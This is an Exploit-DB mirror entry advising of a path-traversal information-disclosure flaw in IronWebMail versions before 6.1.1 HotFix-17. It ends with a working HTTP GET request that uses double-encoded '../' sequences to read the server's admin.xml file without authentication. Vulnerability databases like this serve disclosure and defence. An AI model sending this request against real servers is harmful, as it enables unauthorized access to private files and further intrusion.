exploit-db-mirror/exploits/php/webapps/28778.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

9 lines
No EOL
616 B
Text

source: http://www.securityfocus.com/bid/20436/info
IronWebMail is prone to a remote information-disclosure vulnerability because the application fails to properly sanitize user-supplied input.
Exploiting this issue allows remote, unauthenticated attackers to retrieve the contents of arbitrary files from vulnerable computers with the privileges of the webserver process. Information harvested may aid in further attacks.
IronWebMail versions prior to 6.1.1 HotFix-17 are affected by this vulnerability.
GET /IM_FILE(%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/admin.xml) HTTP/1.0[CRLF][CRLF]